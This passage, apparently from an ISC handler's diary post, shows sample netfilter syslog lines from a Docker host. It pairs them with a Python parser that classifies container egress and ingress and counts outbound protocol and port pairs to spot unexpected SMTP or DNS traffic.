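Jun  1 20:15:36 inception kernel: [8415191.429757] IN=docker0 OUT=eth0 PHYSIN=veth2ad35f6 MAC=02:42:c6:a7:b3:f2:02:42:ac:11:00:04:08:00 SRC=172.17.0.4 DST=198.51.100.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=15759 DF PROTO=TCP SPT=41017 DPT=25 WINDOW=229 RES=0x00 ACK URGP=0
Jun  1 20:59:10 inception kernel: [8417805.742798] IN=eth0 OUT=docker0 MAC=c2:41:32:db:26:fc:00:00:24:d0:69:51:08:00 SRC=203.0.113.77 DST=172.17.0.2 LEN=140 TOS=0x18 PREC=0x20 TTL=117 ID=7085 DF PROTO=TCP SPT=50424 DPT=2222 WINDOW=512 RES=0x00 ACK PSH URGP=0
Jun  1 21:03:12 inception kernel: [8418047.101010] IN=docker0 OUT=eth0 PHYSIN=veth2ad35f6 MAC=02:42:c6:a7:b3:f2:02:42:ac:11:00:04:08:00 SRC=172.17.0.4 DST=198.51.100.53 LEN=68 TOS=0x00 PREC=0x00 TTL=63 ID=15760 DF PROTO=UDP SPT=51234 DPT=53 LEN=48
Jun  1 21:04:00 inception sshd[1234]: Accepted publickey for xavier from 203.0.113.77
"""


def parse_log_line(line, bridge="docker0"):
    """One netfilter LOG line -> dict of its fields, or None for any other syslog line."""
    if " kernel: " not in line or " IN=" not in line:
        return None
    rec = dict(KV.findall(line))   # for UDP the second LEN= (datagram length) overwrites the IP LEN=
    for key in INT_FIELDS:
        if key in rec:
            rec[key] = int(rec[key])
    rec["FLAGS"] = sorted(tok for tok in line.split() if tok in BARE_FLAGS)
    if rec.get("IN") == bridge:
        rec["direction"] = "egress"      # container -> outside world
    elif rec.get("OUT") == bridge:
        rec["direction"] = "ingress"     # outside world -> container (published port)
    else:
        rec["direction"] = "other"
    return rec


def records(text, bridge="docker0"):
    """All LOG records found in a chunk of syslog text, in order."""
    return [r for r in (parse_log_line(l, bridge) for l in text.splitlines()) if r]


def egress_summary(text, bridge="docker0"):
    """Count (protocol, destination port) pairs for container egress: a quick way to
    spot a container talking SMTP or DNS to the outside when it has no business doing so."""
    counts = Counter((r.get("PROTO"), r.get("DPT"))
                     for r in records(text, bridge) if r["direction"] == "egress")
    return dict(counts)


if __name__ == "__main__":
    for r in records(SAMPLE_SYSLOG):
        print(r["direction"], r["PROTO"],
              f"{r['SRC']}:{r.get('SPT')} -> {r['DST']}:{r.get('DPT')}", r["FLAGS"])
    print(egress_summary(SAMPLE_SYSLOG))
```

The PHYSIN field names the veth end of the container that sent the packet, so joining it with the container inventory at the time of the event (docker inspect output is enough) ties an egress record back to a container name and image. With the LOG rule at position 1 of FORWARD this parser sees every forwarded packet, so in practice you would feed it the syslog stream rather than a file.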

In many applications and products, the default settings lack proper logging. Be sure to review the settings so that enough events are generated to investigate later! Happy hunting...

Xavier Mertens
ISC Handler - Freelance Security Consultant